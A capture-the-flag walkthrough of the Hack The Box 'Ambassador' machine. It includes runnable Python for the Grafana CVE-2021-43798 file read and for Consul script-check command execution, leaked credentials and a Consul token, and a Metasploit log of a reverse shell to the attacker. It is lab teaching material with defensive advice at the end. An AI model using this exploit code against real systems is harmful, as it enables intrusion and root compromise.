Ambassador - HTB - Key Points
November 3, 2022•610 words
Target's IP: 10.10.11.183
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3000/tcp open ppp
3306/tcp open mysql
Port 3000 (nmap's guess of ppp is wrong) is Grafana, and this version has an unauthenticated arbitrary file read: the plugin asset route /public/plugins/<plugin-id>/ does not sanitise ../ segments, so any file the grafana user can read comes back (CVE-2021-43798, exploit-db 50581: https://www.exploit-db.com/exploits/50581). The client has to send the ../ literally; with curl that means --path-as-is.
Reading /etc/passwd shows that, besides root, consul, grafana and developer are users on the box.
Guessing well-known configuration paths, we can also read /etc/grafana/grafana.ini. Lines beginning with ; are commented-out defaults, so the one live setting in this excerpt is admin_password:
# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = sqlite3
;host = 127.0.0.1:3306
;name = grafana
;user = root
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
;password =
# default admin user, created on startup
;admin_user = admin
# default admin password, can be changed before first start of grafana, or in profile settings
admin_password = messageInABottle685427
# used for signing
;secret_key = SW2YcwTIb9zpOOhoPsMm
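The file read and the two parsing steps above, as an added example that is not code from the writeup or from the exploit-db entry. It assumes Grafana is at the target address from the scan and that alertlist is a plugin id shipped with Grafana (any bundled plugin works; the traversal is resolved before the plugin is looked up). The passwd and ini texts at the bottom are constructed samples standing in for what the target returns.

```python
"""Added example, not from the original writeup: read files through the Grafana
plugin-asset path traversal and pull the useful facts out of what comes back."""
import urllib.request

GRAFANA = "http://10.10.11.183:3000"   # target from the writeup
PLUGIN = "alertlist"                   # assumption: any plugin id shipped with Grafana


def traversal_url(base: str, path: str, plugin: str = PLUGIN, depth: int = 8) -> str:
    """Build <base>/public/plugins/<plugin>/../../...<path>.
    The '..' segments are left literal on purpose: the server resolves them.
    (urllib sends the path as written; with curl you need --path-as-is.)"""
    rel = "../" * depth + path.lstrip("/")
    return f"{base}/public/plugins/{plugin}/{rel}"


def read_file(path: str, base: str = GRAFANA) -> str:
    """Fetch one file from the target through the traversal."""
    with urllib.request.urlopen(traversal_url(base, path), timeout=10) as resp:
        return resp.read().decode(errors="replace")


def login_users(passwd_text: str) -> list:
    """Accounts in /etc/passwd with a real login shell (the ones worth trying over SSH)."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        if fields[6].rsplit("/", 1)[-1] in ("nologin", "false", "sync"):
            continue
        users.append(fields[0])
    return users


def active_settings(ini_text: str) -> dict:
    """Settings actually in effect in grafana.ini: lines starting with ';' or '#'
    are comments, so only uncommented key = value pairs count. Keys are prefixed
    with their [section]; surrounding quotes (including the triple-quote form) are stripped."""
    settings, section = {}, ""
    for raw in ini_text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if "=" in line:
            key, value = line.split("=", 1)
            key = f"{section}.{key.strip()}" if section else key.strip()
            settings[key] = value.strip().strip('"')
    return settings


# Constructed samples standing in for what read_file() returns on the box.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
consul:x:997:997::/home/consul:/bin/false
grafana:x:998:998::/usr/share/grafana:/bin/bash
developer:x:1000:1000::/home/developer:/bin/bash
"""

SAMPLE_INI = """[database]
# Either "mysql", "postgres" or "sqlite3", it's your choice
;type = sqlite3
;password =

[security]
;admin_user = admin
admin_password = messageInABottle685427
;secret_key = SW2YcwTIb9zpOOhoPsMm
"""

if __name__ == "__main__":
    print(login_users(SAMPLE_PASSWD))        # offline run on the constructed samples
    print(active_settings(SAMPLE_INI))
    # Against the box: print(active_settings(read_file("/etc/grafana/grafana.ini")))
```

Run it as-is for the offline demonstration; against the target, swap the sample text for read_file() calls. The depth of 8 is deliberately generous: extra ../ segments past the filesystem root are harmless, too few will miss.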
The MySQL user grafana has the password do...21! (elided here); Grafana keeps it as the credentials of its MySQL datasource, which is where it is recovered once we are in with the admin password. Connecting to MySQL on 3306 with it, the whackywidget database holds a users table:
MySQL [whackywidget]> select * from users;
+-----------+------------------------------------------+
| user | pass |
+-----------+------------------------------------------+
| developer | YW...g== |
+-----------+------------------------------------------+
1 row in set (0.166 sec)
The pass column is base64 (note the == padding); decoded, it is developer's password, which also works for SSH on port 22:
developer@ambassador:~$ cat user.txt
41...49
Checking for processes running as root, there is a Consul agent:
/usr/bin/consul agent -config-dir=/etc/consul.d/config.d -config-file=/etc/consul.d/consul.hcl
To interact with the agent (HTTP API on 8500 by default, or the consul CLI) we need an ACL token.
Looking for readable directories outside the usual places, /opt/my-app is a git repository. One revision of put-config-in-consul.sh reads the token from the environment while the other hardcodes it; git keeps both, so the token is recoverable from the history:
developer@ambassador:/opt/my-app$ git diff 33a53ef9a207976d5ceceddc41a199558843bf3c c982db8eff6f10f8f3a7d802f79f2705e7a21b55
diff --git a/whackywidget/put-config-in-consul.sh b/whackywidget/put-config-in-consul.sh
index fc51ec0..35c08f6 100755
--- a/whackywidget/put-config-in-consul.sh
+++ b/whackywidget/put-config-in-consul.sh
@@ -1,4 +1,4 @@
# We use Consul for application config in production, this script will help set the correct values for the app
-# Export MYSQL_PASSWORD and CONSUL_HTTP_TOKEN before running
+# Export MYSQL_PASSWORD before running
-consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
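Review bot: the `+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 ...` line hardcodes a Consul ACL token in a script that is committed to the repository; keep the behaviour described by the removed comment, reading it from CONSUL_HTTP_TOKEN (the consul CLI picks that variable up by itself, so the --token flag is unnecessary), and rotate this token, because a later commit that deletes the line still leaves it in the history.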
With the token, Metasploit's exploit/multi/misc/consul_service_exec registers a service with a script health check through the agent API; the agent executes the check with its own privileges, root here. This only works when the agent was started with script checks enabled, which the successful run below confirms.
msf6 exploit(multi/misc/consul_service_exec) > run
[*] Started reverse TCP handler on 10.10.14.12:4444
[*] Creating service 'JMIna'
[*] Service 'JMIna' successfully created.
[*] Waiting for service 'JMIna' script to trigger
[*] Sending stage (1017704 bytes) to 10.10.11.183
[*] Meterpreter session 1 opened (10.10.14.12:4444 -> 10.10.11.183:48698) at 2022-10-26 17:21:57 +0200
[*] Removing service 'JMIna'
[*] Command Stager progress - 100.00% done (763/763 bytes)
meterpreter > shell
Process 30708 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
25...2e
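What the Metasploit module does under the hood, as an added example that is neither the module's code nor from the writeup: register a service whose health check is a shell command, let the agent run it, then deregister. It assumes the agent API is on the default port on the box itself and uses the token recovered from the git history; the diff text at the top is the two hunk lines from above, included so the token-hunting helper can be run offline. The setuid-bash payload in the main block is an illustration of "runs as root", not a step from the page.

```python
"""Added example, not from the original writeup: the service-registration trick
behind exploit/multi/misc/consul_service_exec, done by hand with urllib, plus a
helper that pulls Consul-style tokens out of git history output."""
import json
import re
import time
import urllib.request

# Assumptions: agent HTTP API on the default port, token from /opt/my-app history.
CONSUL = "http://127.0.0.1:8500"
TOKEN = "bb03b43b-1d81-d62b-24b5-39540ee469b5"

# Consul ACL tokens are UUIDs; commit hashes (plain hex, no dashes) do not match.
UUID_RE = re.compile(r"\b[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\b")

# Constructed sample: the two changed lines from the writeup's git diff.
SAMPLE_DIFF = """-consul kv put whackywidget/db/mysql_pw $MYSQL_PASSWORD
+consul kv put --token bb03b43b-1d81-d62b-24b5-39540ee469b5 whackywidget/db/mysql_pw $MYSQL_PASSWORD
"""


def find_consul_tokens(text: str) -> list:
    """Distinct UUID-shaped values in text, e.g. the output of `git log -p`."""
    found = []
    for token in UUID_RE.findall(text):
        if token not in found:
            found.append(token)
    return found


def service_registration(name: str, command: str, interval: str = "10s") -> dict:
    """Body for PUT /v1/agent/service/register. The check's Args are executed by
    the agent every interval with the agent's own privileges, but only if it was
    started with enable_script_checks or enable_local_script_checks."""
    return {
        "ID": name,
        "Name": name,
        "Check": {
            "Name": name + "-check",
            "Args": ["/bin/sh", "-c", command],
            "Interval": interval,
            "Timeout": "5s",
        },
    }


def consul_request(method: str, path: str, payload=None, base: str = CONSUL, token: str = TOKEN):
    """Authenticated call to the agent API; returns (status, body)."""
    data = None if payload is None else json.dumps(payload).encode()
    req = urllib.request.Request(
        base + path, data=data, method=method,
        headers={"X-Consul-Token": token, "Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.status, resp.read().decode()


def run_via_check(command: str, name: str = "whackywidget-health") -> int:
    """Register, wait for the first check run, deregister so nothing is left behind.
    Returns the HTTP status of the deregistration."""
    consul_request("PUT", "/v1/agent/service/register", service_registration(name, command, "5s"))
    time.sleep(8)   # the first run happens within one interval
    status, _ = consul_request("PUT", "/v1/agent/service/deregister/" + name)
    return status


if __name__ == "__main__":
    print(find_consul_tokens(SAMPLE_DIFF))
    # On the box (illustration): the check runs as root because the agent does.
    # print(run_via_check("cp /bin/bash /tmp/rootbash && chmod u+s /tmp/rootbash"))
```

On the defensive side the same three facts are the fix: run the agent without script checks unless a service genuinely needs them, give it a default-deny ACL policy so a leaked KV token cannot register services, and never run the agent as root.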
Merry hacking ;)